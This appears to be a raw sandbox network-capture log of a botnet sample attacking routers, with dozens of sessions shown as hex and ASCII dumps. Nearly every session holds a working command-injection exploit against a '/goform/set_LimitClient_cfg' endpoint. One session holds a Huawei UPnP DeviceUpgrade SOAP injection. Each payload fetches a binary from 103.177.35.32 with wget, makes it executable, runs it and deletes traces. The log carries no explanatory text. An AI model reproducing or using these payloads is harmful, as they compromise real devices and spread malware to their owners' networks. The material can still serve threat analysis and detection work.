                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        722192.168.2.235454489.47.160.1528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323571920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        723192.168.2.2352896157.196.211.1037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.387563944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        724192.168.2.233698024.197.8.1238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399662971 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        725192.168.2.2337216195.118.70.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399694920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        726192.168.2.2359198107.15.64.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399714947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        727192.168.2.235468061.162.231.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399745941 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        728192.168.2.2352548161.83.239.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399749041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        729192.168.2.2337004175.75.148.878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399749041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        730192.168.2.233671062.239.6.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399771929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        731192.168.2.235832460.75.44.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399799109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        732192.168.2.2344734115.10.234.428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399804115 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        733192.168.2.2340276144.253.50.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399815083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        734192.168.2.233339234.140.29.1648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399832964 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        735192.168.2.2350210145.18.181.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399859905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        736192.168.2.2337266211.60.55.48080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399861097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        737192.168.2.2343712219.68.132.778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.399888039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        738192.168.2.2335670194.132.31.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400058031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        739192.168.2.2359926106.3.47.388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400095940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        740192.168.2.2354390201.14.239.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400127888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        741192.168.2.2335052146.141.125.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400161982 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        742192.168.2.2350248211.253.252.1228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400177956 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        743192.168.2.235488287.33.82.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400218964 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
